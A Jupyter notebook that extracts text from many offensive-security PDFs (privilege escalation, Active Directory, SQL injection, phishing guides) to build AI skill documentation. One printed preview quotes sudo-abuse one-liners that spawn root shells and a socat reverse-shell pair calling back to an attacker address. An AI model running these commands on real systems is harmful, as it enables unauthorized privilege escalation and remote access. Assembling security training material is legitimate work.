# PDF Analysis for SKILLS.md Documentation

This notebook extracts and analyzes content from security-focused PDF files to create structured documentation for Claude AI SKILLS.md files.

In [12]:
# Import Required Libraries
import fitz  # PyMuPDF
import os
import json
from pathlib import Path

# Base directory holding the source PDFs. The SECOPS_PDF_DIR environment
# variable overrides the default, so the notebook is not tied to one
# absolute checkout location; without it the original path is used.
PDF_DIR = os.environ.get("SECOPS_PDF_DIR", "/workspaces/SecOps-CLI-Guides/files")

# Batch 1: file names (relative to PDF_DIR) of the PDFs to analyze
PDF_FILES = [
    "40 Methods for Privilege Escalation.pdf",
    "APIs Fuzzing for Bug Bounty.pdf",
    "AWS Pentest.pdf",
    "Active Directory Attacks.pdf",
    "All-About-Hacking.pdf",
    "Attacking Active Directory (AD) from Kali Linux.pdf",
    "BGP_Routing_Protocol.pdf",
    "Buffer Overflow.pdf",
    "Build A Malicious Lab.pdf",
    "Burp Suite User Manual.pdf"
]

print("Libraries imported successfully!")

Libraries imported successfully!


In [13]:
def extract_pdf_text(pdf_path, max_pages=50):
    """Extract text from the first pages of a PDF file.

    Args:
        pdf_path: Path handed to ``fitz.open``.
        max_pages: Upper bound on the number of pages read (default 50).

    Returns:
        On success, a dict with ``total_pages`` (page count of the document),
        ``pages_read`` (number of pages actually read) and ``text`` (the text
        of each page read, joined with newlines).
        On any exception, ``{"error": <exception message>}`` instead of
        raising.
    """
    try:
        doc = fitz.open(pdf_path)
        try:
            total_pages = len(doc)
            pages_to_read = min(max_pages, total_pages)
            text_content = [doc[page_num].get_text() for page_num in range(pages_to_read)]
        finally:
            # Release the document even when reading a page fails; previously
            # an exception in the loop skipped close() and leaked the handle.
            doc.close()

        return {
            "total_pages": total_pages,
            "pages_read": pages_to_read,
            "text": "\n".join(text_content)
        }
    except Exception as e:
        # Best-effort by design: callers check for the "error" key.
        return {"error": str(e)}

def analyze_pdf(pdf_name):
    """Analyze a single PDF from PDF_DIR and return its extracted text.

    Args:
        pdf_name: File name of the PDF, joined onto ``PDF_DIR``.

    Returns:
        On success, a dict with ``name``, ``total_pages``, ``text_preview``
        (at most the first 5000 characters) and ``full_text``.
        If extraction reported an error, ``{"name": ..., "error": ...}``.
    """
    pdf_path = os.path.join(PDF_DIR, pdf_name)
    result = extract_pdf_text(pdf_path)

    if "error" in result:
        return {"name": pdf_name, "error": result["error"]}

    # extract_pdf_text is redefined further down the notebook and those
    # versions store the text under "content" rather than "text". Accept
    # either key so this function works whichever definition is live.
    text = result["text"] if "text" in result else result.get("content", "")

    return {
        "name": pdf_name,
        "total_pages": result["total_pages"],
        # Slicing already copes with strings shorter than the limit.
        "text_preview": text[:5000],
        "full_text": text
    }

print("Analysis functions defined!")

Analysis functions defined!


In [3]:
# Analyze PDF 1: 40 Methods for Privilege Escalation
pdf1 = analyze_pdf("40 Methods for Privilege Escalation.pdf")

# Header first, then the preview; a failed analysis has no preview,
# so the error message (or a placeholder) is shown in its place.
print(f"=== {pdf1['name']} ===")
page_count = pdf1.get('total_pages', 'N/A')
print(f"Total Pages: {page_count}")
print("\n--- Content Preview ---")
preview = pdf1.get('text_preview', pdf1.get('error', 'No content'))
print(preview)

=== 40 Methods for Privilege Escalation.pdf ===
Total Pages: 186

--- Content Preview ---
40 METHODS FOR PRIVILEGE
ESCALATION
PART 1
HADESS | SECURE AGILE DEVELOPMENT
WWW.HADESS.IO

Domain: No
Local Admin: Yes
​
OS: Linux
Type:  Abusing Privileged Files
sudo vim -c ':!/bin/bash'
sudo find / etc/passwd -exec /bin/bash \;
echo "os.execute('/bin/bash/')" > /tmp/shell.nse && sudo nmap --
script=/tmp/shell.nse
sudo env /bin/bash
sudo awk 'BEGIN {system("/bin/bash")}'
sudo perl -e 'exec "/bin/bash";'
sudo python -c 'import pty;pty.spawn("/bin/bash")'
sudo less /etc/hosts - !bash
sudo man man - !bash
sudo ftp - ! /bin/bash
Attacker = socat file:`tty`,raw,echo=0 tcp-listen:1234
Victim 
= 
sudo 
socat 
exec:'sh 
-li',pty,stderr,setsid,sigint,sane
tcp:192.168.1.105:1234
echo test > notes.txt
sudo zip test.zip notes.txt -T --unzip-command="sh -c /bin/bash"
sudo gcc -wrapper /bin/bash,-s .
ABUSING SUDO BINARIES
HADESS | SECURE AGILE DEVELOPMENT
Difficulty
APT Used
Detection

Domain: Y/N
Local Admi

In [4]:
# Run the analysis over every batch 1 PDF, keyed by file name
all_results = {}

for pdf_name in PDF_FILES:
    print(f"Processing: {pdf_name}...")
    result = analyze_pdf(pdf_name)
    all_results[pdf_name] = result

    # Failed analyses have neither key, hence the fallbacks.
    page_count = result.get('total_pages', 'N/A')
    content_length = len(result.get('full_text', ''))
    print(f"  Pages: {page_count}")
    print(f"  Content length: {content_length}")

print("\n=== All PDFs processed! ===")

Processing: 40 Methods for Privilege Escalation.pdf...
  Pages: 186
  Content length: 19220
Processing: APIs Fuzzing for Bug Bounty.pdf...
  Pages: 7
  Content length: 10747
Processing: AWS Pentest.pdf...
  Pages: 55
  Content length: 57367
Processing: Active Directory Attacks.pdf...
  Pages: 102
  Content length: 69987
Processing: All-About-Hacking.pdf...
  Pages: 238
  Content length: 58837
Processing: Attacking Active Directory (AD) from Kali Linux.pdf...
  Pages: 28
  Content length: 25477
Processing: BGP_Routing_Protocol.pdf...
  Pages: 155
  Content length: 97746
Processing: Buffer Overflow.pdf...
  Pages: 44
  Content length: 33118
Processing: Build A Malicious Lab.pdf...
  Pages: 12
  Content length: 17481
Processing: Burp Suite User Manual.pdf...
  Pages: 23
  Content length: 19424

=== All PDFs processed! ===


In [5]:
# Save extracted content to text files for review
output_dir = "/workspaces/SecOps-CLI-Guides/extracted"
os.makedirs(output_dir, exist_ok=True)

for pdf_name, data in all_results.items():
    filename = pdf_name.replace(".pdf", ".txt").replace(" ", "_")
    filepath = os.path.join(output_dir, filename)
    # Explicit UTF-8: the extracted text contains non-ASCII characters, and
    # the platform default encoding may not be able to represent them.
    with open(filepath, "w", encoding="utf-8") as f:
        f.write(f"=== {pdf_name} ===\n")
        f.write(f"Total Pages: {data.get('total_pages', 'N/A')}\n")
        f.write("=" * 60 + "\n\n")
        # A failed analysis has no text; its error message is written instead.
        f.write(data.get("full_text", data.get("error", "No content")))
    print(f"Saved: {filename}")

print("\nAll content saved to /workspaces/SecOps-CLI-Guides/extracted/")

Saved: 40_Methods_for_Privilege_Escalation.txt
Saved: APIs_Fuzzing_for_Bug_Bounty.txt
Saved: AWS_Pentest.txt
Saved: Active_Directory_Attacks.txt
Saved: All-About-Hacking.txt
Saved: Attacking_Active_Directory_(AD)_from_Kali_Linux.txt
Saved: BGP_Routing_Protocol.txt
Saved: Buffer_Overflow.txt
Saved: Build_A_Malicious_Lab.txt
Saved: Burp_Suite_User_Manual.txt

All content saved to /workspaces/SecOps-CLI-Guides/extracted/


In [6]:
# Batch 2 PDF Analysis - Extract and analyze 10 PDF files
import fitz
import os

def extract_pdf_text(pdf_path, max_pages=50):
    """Extract text from the first pages of a PDF file, skipping blank pages.

    Args:
        pdf_path: Path handed to ``fitz.open``.
        max_pages: Upper bound on the number of pages read (default 50).

    Returns:
        On success, a dict with ``total_pages`` (page count of the document),
        ``pages_read`` (number of pages visited) and ``content`` (the text of
        every visited page that is not whitespace-only, joined with newlines).
        The same string is also returned under ``text``.
        On any exception, ``{"error": <exception message>}`` instead of
        raising.
    """
    try:
        doc = fitz.open(pdf_path)
        try:
            total_pages = len(doc)
            pages_to_read = min(max_pages, total_pages)

            text = []
            for page_num in range(pages_to_read):
                page_text = doc[page_num].get_text()
                if page_text.strip():
                    text.append(page_text)
        finally:
            # Release the document even when reading a page fails; previously
            # an exception in the loop skipped close() and leaked the handle.
            doc.close()

        content = "\n".join(text)
        return {
            "total_pages": total_pages,
            "pages_read": pages_to_read,
            "content": content,
            # This definition replaces an earlier extract_pdf_text whose
            # result key was "text"; analyze_pdf still reads that key, so
            # keep it available as an alias.
            "text": content
        }
    except Exception as e:
        # Best-effort by design: callers check for the "error" key.
        return {"error": str(e)}

# Batch 2 files
batch2_files = [
    "Burp_Suite.pdf",
    "CSRF Notes.pdf",
    "Cloud Pentest Cheat sheet.pdf",
    "Cross_site_Scripting_and_HTML_Injection.pdf",
    "DDoS_Attack.pdf",
    "Enumeration Checklist For OSCP Exam.pdf",
    "Ethical Hacking By Joe Grant.pdf",
    "External Network Penetration Testing.pdf",
    "File_Path_Traversal.pdf",
    "HTML Injection.pdf"
]

PDF_DIR = "/workspaces/SecOps-CLI-Guides/files"
batch2_results = {}

for filename in batch2_files:
    filepath = os.path.join(PDF_DIR, filename)

    # Missing files are recorded as errors and skipped.
    if not os.path.exists(filepath):
        print(f"NOT FOUND: {filename}")
        batch2_results[filename] = {"error": "File not found"}
        continue

    print(f"Extracting: {filename}")
    extracted = extract_pdf_text(filepath)
    batch2_results[filename] = extracted
    print(f"  - Pages: {extracted.get('total_pages', 'N/A')}")

# Only results that carry a 'content' key count as successful.
success_count = sum(1 for r in batch2_results.values() if 'content' in r)
print(f"\nExtracted {success_count} PDFs successfully")

Extracting: Burp_Suite.pdf
  - Pages: 23
Extracting: CSRF Notes.pdf
  - Pages: 7
Extracting: Cloud Pentest Cheat sheet.pdf
  - Pages: 31
Extracting: Cross_site_Scripting_and_HTML_Injection.pdf
  - Pages: 17
Extracting: DDoS_Attack.pdf
  - Pages: 31
Extracting: Enumeration Checklist For OSCP Exam.pdf
  - Pages: 1
Extracting: Ethical Hacking By Joe Grant.pdf
  - Pages: 112
Extracting: External Network Penetration Testing.pdf
  - Pages: 10
Extracting: File_Path_Traversal.pdf
  - Pages: 20
Extracting: HTML Injection.pdf
  - Pages: 10

Extracted 10 PDFs successfully


In [7]:
# PDF 1: Burp_Suite.pdf - Display content
burp_result = batch2_results["Burp_Suite.pdf"]
content = burp_result["content"]

# Header with the page count, then the first 15000 characters of text
print(f"=== Burp_Suite.pdf ({burp_result['total_pages']} pages) ===\n")
print(content[:15000])

=== Burp_Suite.pdf (23 pages) ===

1 
 
 
 
 
BURPSUITE 

2 
 
 
Table of Contents 
Table of Contents ............................................................................................................... 2 
1. Burp Suite Overview ...................................................................................................... 4 
1.1. 
What is Burp Suite? ........................................................................................... 4 
1.2. 
Editions of Burp Suite ....................................................................................... 4 
1.3. 
Use Cases ........................................................................................................... 4 
1.4. 
Download and Installation Steps ....................................................................... 5 
2. 
Intercept HTTP traffic with Burp Proxy ............................................................ 5 
2.1. 
Launch Burp's browser ......................................

In [8]:
# Save all Batch 2 extractions to text files
output_dir = "/workspaces/SecOps-CLI-Guides/extracted"
os.makedirs(output_dir, exist_ok=True)

for filename, data in batch2_results.items():
    # Entries without "content" are failed or missing files; nothing to save.
    if "content" in data:
        safe_name = filename.replace(" ", "_").replace(".pdf", ".txt")
        output_path = os.path.join(output_dir, safe_name)
        # Explicit UTF-8: the extracted text contains non-ASCII characters, and
        # the platform default encoding may not be able to represent them.
        with open(output_path, "w", encoding="utf-8") as f:
            f.write(f"=== {filename} ===\n")
            f.write(f"Total Pages: {data['total_pages']}\n")
            f.write("=" * 60 + "\n\n")
            f.write(data["content"])
        print(f"Saved: {safe_name}")

print("\nAll files saved to extracted/ directory")

Saved: Burp_Suite.txt
Saved: CSRF_Notes.txt
Saved: Cloud_Pentest_Cheat_sheet.txt
Saved: Cross_site_Scripting_and_HTML_Injection.txt
Saved: DDoS_Attack.txt
Saved: Enumeration_Checklist_For_OSCP_Exam.txt
Saved: Ethical_Hacking_By_Joe_Grant.txt
Saved: External_Network_Penetration_Testing.txt
Saved: File_Path_Traversal.txt
Saved: HTML_Injection.txt

All files saved to extracted/ directory


## Batch 3 PDF Analysis

Extracting and analyzing 10 additional PDF files:
1. Introduction to IDOR.pdf
2. JSON_Web_Token_Hacking.pdf
3. John_the_Ripper.pdf
4. LDAP_Injection.pdf
5. LINUX PRIVILEGE ESCALATION.pdf
6. Linux Commands.pdf
7. Linux Production Shell Scripts.pdf
8. Linux_Pentest.pdf
9. Metasploit.pdf
10. Mobile Security Testing Guide.pdf

In [9]:
# Batch 3 PDF Analysis - Extract and analyze 10 PDF files
import fitz
import os

def extract_pdf_text(pdf_path, max_pages=50):
    """Extract text from the first pages of a PDF file, skipping blank pages.

    Args:
        pdf_path: Path handed to ``fitz.open``.
        max_pages: Upper bound on the number of pages read (default 50).

    Returns:
        On success, a dict with ``total_pages`` (page count of the document),
        ``pages_read`` (number of pages visited) and ``content`` (the text of
        every visited page that is not whitespace-only, joined with newlines).
        The same string is also returned under ``text``.
        On any exception, ``{"error": <exception message>}`` instead of
        raising.
    """
    try:
        doc = fitz.open(pdf_path)
        try:
            total_pages = len(doc)
            pages_to_read = min(max_pages, total_pages)

            text = []
            for page_num in range(pages_to_read):
                page_text = doc[page_num].get_text()
                if page_text.strip():
                    text.append(page_text)
        finally:
            # Release the document even when reading a page fails; previously
            # an exception in the loop skipped close() and leaked the handle.
            doc.close()

        content = "\n".join(text)
        return {
            "total_pages": total_pages,
            "pages_read": pages_to_read,
            "content": content,
            # This is the last definition of extract_pdf_text in the notebook,
            # so it is the one live for every later cell. analyze_pdf and the
            # Batch 6 save cell read the "text" key, so keep it as an alias.
            "text": content
        }
    except Exception as e:
        # Best-effort by design: callers check for the "error" key.
        return {"error": str(e)}

# Batch 3 files
batch3_files = [
    "Introduction to IDOR.pdf",
    "JSON_Web_Token_Hacking.pdf",
    "John_the_Ripper.pdf",
    "LDAP_Injection.pdf",
    "LINUX PRIVILEGE ESCALATION.pdf",
    "Linux Commands.pdf",
    "Linux Production Shell Scripts.pdf",
    "Linux_Pentest.pdf",
    "Metasploit.pdf",
    "Mobile Security Testing Guide.pdf"
]

PDF_DIR = "/workspaces/SecOps-CLI-Guides/files"
batch3_results = {}

for filename in batch3_files:
    filepath = os.path.join(PDF_DIR, filename)
    found = os.path.exists(filepath)

    # Announce the outcome, then store either the extraction or an error entry.
    print(f"Extracting: {filename}" if found else f"NOT FOUND: {filename}")
    if found:
        outcome = extract_pdf_text(filepath)
        batch3_results[filename] = outcome
        print(f"  - Pages: {outcome.get('total_pages', 'N/A')}")
    else:
        batch3_results[filename] = {"error": "File not found"}

# Only results that carry a 'content' key count as successful.
extracted_ok = [r for r in batch3_results.values() if 'content' in r]
print(f"\nExtracted {len(extracted_ok)} PDFs successfully")

Extracting: Introduction to IDOR.pdf
  - Pages: 41
Extracting: JSON_Web_Token_Hacking.pdf
  - Pages: 13
Extracting: John_the_Ripper.pdf
  - Pages: 33
Extracting: LDAP_Injection.pdf
  - Pages: 18
Extracting: LINUX PRIVILEGE ESCALATION.pdf
  - Pages: 42
Extracting: Linux Commands.pdf
  - Pages: 31
Extracting: Linux Production Shell Scripts.pdf
  - Pages: 10
Extracting: Linux_Pentest.pdf
  - Pages: 48
Extracting: Metasploit.pdf
  - Pages: 6
Extracting: Mobile Security Testing Guide.pdf
  - Pages: 110

Extracted 10 PDFs successfully


In [10]:
# Save all Batch 3 extractions to text files
output_dir = "/workspaces/SecOps-CLI-Guides/extracted"
os.makedirs(output_dir, exist_ok=True)

for filename, data in batch3_results.items():
    # Entries without "content" are failed or missing files; nothing to save.
    if "content" in data:
        safe_name = filename.replace(" ", "_").replace(".pdf", ".txt")
        output_path = os.path.join(output_dir, safe_name)
        # Explicit UTF-8: the extracted text can contain non-ASCII characters,
        # and the platform default encoding may not be able to represent them.
        with open(output_path, "w", encoding="utf-8") as f:
            f.write(f"=== {filename} ===\n")
            f.write(f"Total Pages: {data['total_pages']}\n")
            f.write("=" * 60 + "\n\n")
            f.write(data["content"])
        print(f"Saved: {safe_name}")

print("\nAll Batch 3 files saved to extracted/ directory")

Saved: Introduction_to_IDOR.txt
Saved: JSON_Web_Token_Hacking.txt
Saved: John_the_Ripper.txt
Saved: LDAP_Injection.txt
Saved: LINUX_PRIVILEGE_ESCALATION.txt
Saved: Linux_Commands.txt
Saved: Linux_Production_Shell_Scripts.txt
Saved: Linux_Pentest.txt
Saved: Metasploit.txt
Saved: Mobile_Security_Testing_Guide.txt

All Batch 3 files saved to extracted/ directory


## Batch 4: Network & Pentesting Methodology PDFs

Analyzing 10 PDFs focused on networking fundamentals, OSCP preparation, and pentesting methodology.

In [14]:
# Batch 4: Network & Pentesting Methodology PDFs
batch4_files = [
    "Network Ports List.pdf",
    "Network_101.pdf",
    "Networking-Essantials.pdf",
    "Notes and Tools for Red Teamers.pdf",
    "OSCP Cheat Sheet.pdf",
    "OSCP Notes.pdf",
    "Pentest_Check_List.pdf",
    "Pentest_Commands.pdf",
    "Pentesting_from_Beginner_to_Advance.pdf",
    "Phishing Attack Pentest Guide.pdf"
]

# Analyze each file in turn, reporting its page count as we go
batch4_results = {}
for pdf in batch4_files:
    print(f"Analyzing: {pdf}")
    analysis = analyze_pdf(pdf)
    batch4_results[pdf] = analysis
    print(f"  Pages: {analysis.get('total_pages', 'N/A')}")

analyzed_count = len(batch4_results)
print(f"\nBatch 4: Analyzed {analyzed_count} PDFs")

Analyzing: Network Ports List.pdf
  Pages: 21
Analyzing: Network_101.pdf
  Pages: 43
Analyzing: Networking-Essantials.pdf
  Pages: 33
Analyzing: Notes and Tools for Red Teamers.pdf
  Pages: 23
Analyzing: OSCP Cheat Sheet.pdf
  Pages: 36
Analyzing: OSCP Notes.pdf
  Pages: 78
Analyzing: Pentest_Check_List.pdf
  Pages: 17
Analyzing: Pentest_Commands.pdf
  Pages: 22
Analyzing: Pentesting_from_Beginner_to_Advance.pdf
  Pages: 21
Analyzing: Phishing Attack Pentest Guide.pdf
  Pages: 24

Batch 4: Analyzed 10 PDFs


In [15]:
# Display content from each Batch 4 PDF
for pdf_name, data in batch4_results.items():
    extraction_failed = 'error' in data
    page_count = data.get('total_pages', 'N/A')

    print("=" * 80)
    print(f"PDF: {pdf_name}")
    print(f"Total Pages: {page_count}")
    print("-" * 80)

    if not extraction_failed:
        # Extended preview for analysis: first 12000 characters
        text = data.get('full_text', data.get('text_preview', ''))
        print(text[:12000])
    else:
        print(f"ERROR: {data['error']}")
    print("\n")

PDF: Network Ports List.pdf
Total Pages: 21
--------------------------------------------------------------------------------
 
Intelop Corporation 
 
Intelop Corporation 
 
 
 
 
 
 
intelop
intelop
 
 
 
Detailed List of Common Protocols  
 
& traditional  
 
  IP Port Numbers 
 
 
 
 
 
 
(Dr. A Rehman, Intelop Corporation) 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

 
Intelop Corporation 
 
Intelop Corporation 
 
Port 
Protocol 
0 
reserved. 
1 
TCPMUX, TCP Port Service Multiplexer. 
2 
Management Utility. 
3 
Compression Process. 
4 
  
5 
Remote Job Entry. 
6 
  
7 
Echo. 
8 
  
9 
Discard. 
10 
  
11 
SYSTAT. 
12 
  
13 
Daytime. 
14 
  
15 
[was netstat]. 
16 
  
17 
Quote, Quote of the Day. 
18 
RWP, Remote Write Protocol. 
Send, Message Send Protocol. 
19 
Chargen, Character Generator Protocol. 
20 
FTP, File Transfer Protocol, data. 
21 
FTP, File Transfer Protocol, control. 
22 
SSH. 
23 
Telnet. 
24 
Any private mail system. 
25 
SMTP, Simple Mail Transfer Protocol. 
26 
  
27 
NSW U

In [16]:
# PDF 1: Network Ports List
pdf = batch4_results["Network Ports List.pdf"]

# Header line, then the first 15000 characters of the extracted text
pdf_title, page_count = pdf['name'], pdf['total_pages']
print(f"=== {pdf_title} ({page_count} pages) ===\n")
full_text = pdf['full_text']
print(full_text[:15000])

=== Network Ports List.pdf (21 pages) ===

 
Intelop Corporation 
 
Intelop Corporation 
 
 
 
 
 
 
intelop
intelop
 
 
 
Detailed List of Common Protocols  
 
& traditional  
 
  IP Port Numbers 
 
 
 
 
 
 
(Dr. A Rehman, Intelop Corporation) 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

 
Intelop Corporation 
 
Intelop Corporation 
 
Port 
Protocol 
0 
reserved. 
1 
TCPMUX, TCP Port Service Multiplexer. 
2 
Management Utility. 
3 
Compression Process. 
4 
  
5 
Remote Job Entry. 
6 
  
7 
Echo. 
8 
  
9 
Discard. 
10 
  
11 
SYSTAT. 
12 
  
13 
Daytime. 
14 
  
15 
[was netstat]. 
16 
  
17 
Quote, Quote of the Day. 
18 
RWP, Remote Write Protocol. 
Send, Message Send Protocol. 
19 
Chargen, Character Generator Protocol. 
20 
FTP, File Transfer Protocol, data. 
21 
FTP, File Transfer Protocol, control. 
22 
SSH. 
23 
Telnet. 
24 
Any private mail system. 
25 
SMTP, Simple Mail Transfer Protocol. 
26 
  
27 
NSW User System FE. 
28 
  
29 
MSG ICP. 
30 
  
31 
MSG Authentication. 
32 
  
33 
Di

In [17]:
# Save all Batch 4 extractions to text files
output_dir = "/workspaces/SecOps-CLI-Guides/extracted"
os.makedirs(output_dir, exist_ok=True)

for pdf_name, data in batch4_results.items():
    # Failed analyses carry an 'error' key and are not written out.
    if 'error' in data:
        continue

    safe_name = pdf_name.replace('.pdf', '.txt').replace(' ', '_')
    output_path = os.path.join(output_dir, safe_name)
    body = data.get('full_text', '')
    with open(output_path, 'w', encoding='utf-8') as f:
        f.write(body)
    print(f"Saved: {safe_name}")

print(f"\nAll Batch 4 files saved to {output_dir}")

Saved: Network_Ports_List.txt
Saved: Network_101.txt
Saved: Networking-Essantials.txt
Saved: Notes_and_Tools_for_Red_Teamers.txt
Saved: OSCP_Cheat_Sheet.txt
Saved: OSCP_Notes.txt
Saved: Pentest_Check_List.txt
Saved: Pentest_Commands.txt
Saved: Pentesting_from_Beginner_to_Advance.txt
Saved: Phishing_Attack_Pentest_Guide.txt

All Batch 4 files saved to /workspaces/SecOps-CLI-Guides/extracted


## Batch 5: PowerShell, SQL Injection & SSH Security PDFs

In [18]:
# Batch 5: PowerShell, SQL Injection & SSH Security PDFs
batch5_files = [
    "PowerShell_Scripting_Fundamentals.pdf",
    "Quick Pentest Guide.pdf",
    "SMTP Pentest.pdf",
    "SQL Injection.pdf",
    "SQLMap_Database_Pentesting.pdf",
    "SQLi.pdf",
    "SSH Access Through Keys.pdf",
    "SSH_Pentesting.pdf",
    "Scanning Tools.pdf",
    "Session Fixation and Hijacking.pdf"
]

# Analyze each file in turn, reporting its page count as we go
batch5_results = {}
for pdf in batch5_files:
    print(f"Analyzing: {pdf}")
    analysis = analyze_pdf(pdf)
    batch5_results[pdf] = analysis
    print(f"  Pages: {analysis.get('total_pages', 'N/A')}")

analyzed_count = len(batch5_results)
print(f"\nBatch 5: Analyzed {analyzed_count} PDFs")

Analyzing: PowerShell_Scripting_Fundamentals.pdf
  Pages: 31
Analyzing: Quick Pentest Guide.pdf
  Pages: 17
Analyzing: SMTP Pentest.pdf
  Pages: 21
Analyzing: SQL Injection.pdf
  Pages: 21
Analyzing: SQLMap_Database_Pentesting.pdf
  Pages: 25
Analyzing: SQLi.pdf
  Pages: 10
Analyzing: SSH Access Through Keys.pdf
  Pages: 6
Analyzing: SSH_Pentesting.pdf
  Pages: 3
Analyzing: Scanning Tools.pdf
  Pages: 8
Analyzing: Session Fixation and Hijacking.pdf
  Pages: 11

Batch 5: Analyzed 10 PDFs


In [19]:
# PDF 1: PowerShell_Scripting_Fundamentals.pdf
pdf = batch5_results["PowerShell_Scripting_Fundamentals.pdf"]

# Header line, then the first 20000 characters of the extracted text
pdf_title, page_count = pdf['name'], pdf['total_pages']
print(f"=== {pdf_title} ({page_count} pages) ===\n")
full_text = pdf['full_text']
print(full_text[:20000])

=== PowerShell_Scripting_Fundamentals.pdf (31 pages) ===

PowerShell Scripting Fundamentals
1
PowerShell Scripting Fundamentals
PowerShell Variables and Scopes
Variables
A variable is a named storage location in a computer's memory that holds a value that can change.
📢The $ sign at the beginning indicates a variable.
$i = 1
$string = "Hello World!"
$this_is_a_variable = "test"
💡Variables are for storing simple values, strings, and also the output of commands.
$date = Get-Date
Write-Host "Today is" $date
Data Types
PowerShell automatically assigns a data type to a variable based on the type that best suits its 
content.
Using Get-Type  command to find out the data type of a variable:
$x = 4
$string = "Hello World!"
$date = Get-Date
$x.GetType().Name
$string.GetType().Name
$date.GetType().Name

PowerShell Scripting Fundamentals
2
Overview of data types
[string]
[char]
[byte]
[int], [int32]
[long]
[bool]
[decimal]
[single],[float]
[double]
[datetime]
[array]
[hashtable]
[guid]
[psobject],

In [20]:
# Save all Batch 5 extractions to text files
output_dir = "/workspaces/SecOps-CLI-Guides/extracted"
os.makedirs(output_dir, exist_ok=True)

for pdf_name, data in batch5_results.items():
    # Failed analyses carry an 'error' key and are not written out.
    if 'error' in data:
        continue

    safe_name = pdf_name.replace('.pdf', '.txt').replace(' ', '_')
    output_path = os.path.join(output_dir, safe_name)
    body = data.get('full_text', '')
    with open(output_path, 'w', encoding='utf-8') as f:
        f.write(body)
    print(f"Saved: {safe_name}")

print(f"\nAll Batch 5 files saved to {output_dir}")

Saved: PowerShell_Scripting_Fundamentals.txt
Saved: Quick_Pentest_Guide.txt
Saved: SMTP_Pentest.txt
Saved: SQL_Injection.txt
Saved: SQLMap_Database_Pentesting.txt
Saved: SQLi.txt
Saved: SSH_Access_Through_Keys.txt
Saved: SSH_Pentesting.txt
Saved: Scanning_Tools.txt
Saved: Session_Fixation_and_Hijacking.txt

All Batch 5 files saved to /workspaces/SecOps-CLI-Guides/extracted


## Batch 6 - Final Remaining Files

In [21]:
# Batch 6 - Final set of PDFs
batch6_files = [
    "Shodan Pentesting Guide.pdf",
    "Top Web Vulnerabilities.pdf",
    "WI-FI Hacking Notes.pdf",
    "Windows Privilege Escalation Secrets.pdf",
    "Windows Privilege Escalation.pdf",
    "Wireshark.pdf",
    "WordPress_Pentesting.pdf",
    "XSS with Examples.pdf",
    "broken authentication.pdf"
]

# Only successful extractions are stored, so every entry in batch6_results
# is guaranteed to carry page counts and text.
batch6_results = {}
for pdf_name in batch6_files:
    filepath = os.path.join(PDF_DIR, pdf_name)
    if not os.path.exists(filepath):
        print(f"✗ Not found: {pdf_name}")
        continue

    result = extract_pdf_text(filepath, max_pages=40)
    if "error" in result:
        # extract_pdf_text reports failures as {"error": ...}; indexing
        # 'total_pages' on such a result used to raise KeyError here.
        print(f"✗ Failed: {pdf_name} ({result['error']})")
        continue

    batch6_results[pdf_name] = result
    print(f"✓ Extracted: {pdf_name} ({result['total_pages']} pages)")

print(f"\nTotal extracted: {len(batch6_results)} PDFs")

✓ Extracted: Shodan Pentesting Guide.pdf (80 pages)
✓ Extracted: Top Web Vulnerabilities.pdf (33 pages)
✓ Extracted: WI-FI Hacking Notes.pdf (13 pages)
✓ Extracted: Windows Privilege Escalation Secrets.pdf (34 pages)
✓ Extracted: Windows Privilege Escalation.pdf (26 pages)
✓ Extracted: Wireshark.pdf (6 pages)
✓ Extracted: WordPress_Pentesting.pdf (44 pages)
✓ Extracted: XSS with Examples.pdf (22 pages)
✓ Extracted: broken authentication.pdf (12 pages)

Total extracted: 9 PDFs


In [24]:
# Save Batch 6 extractions to text files for analysis
# Defined here as well so this cell does not depend on an earlier save cell
# having been run first.
output_dir = "/workspaces/SecOps-CLI-Guides/extracted"
os.makedirs(output_dir, exist_ok=True)

for pdf_name, data in batch6_results.items():
    # extract_pdf_text is defined more than once in this notebook; depending
    # on which definition produced the result, the text is stored under
    # "text" or "content". Reading only data["text"] raised KeyError when the
    # cells were run top to bottom.
    text = data.get("text", data.get("content"))
    if text is None:
        print(f"Skipped (no extracted text): {pdf_name}")
        continue

    safe_name = pdf_name.replace(".pdf", ".txt").replace(" ", "_")
    output_path = os.path.join(output_dir, safe_name)
    # Explicit UTF-8: the extracted text can contain non-ASCII characters,
    # and the platform default encoding may not be able to represent them.
    with open(output_path, 'w', encoding='utf-8') as f:
        f.write(text)
    print(f"Saved: {safe_name}")

Saved: Shodan_Pentesting_Guide.txt
Saved: Top_Web_Vulnerabilities.txt
Saved: WI-FI_Hacking_Notes.txt
Saved: Windows_Privilege_Escalation_Secrets.txt
Saved: Windows_Privilege_Escalation.txt
Saved: Wireshark.txt
Saved: WordPress_Pentesting.txt
Saved: XSS_with_Examples.txt
Saved: broken_authentication.txt
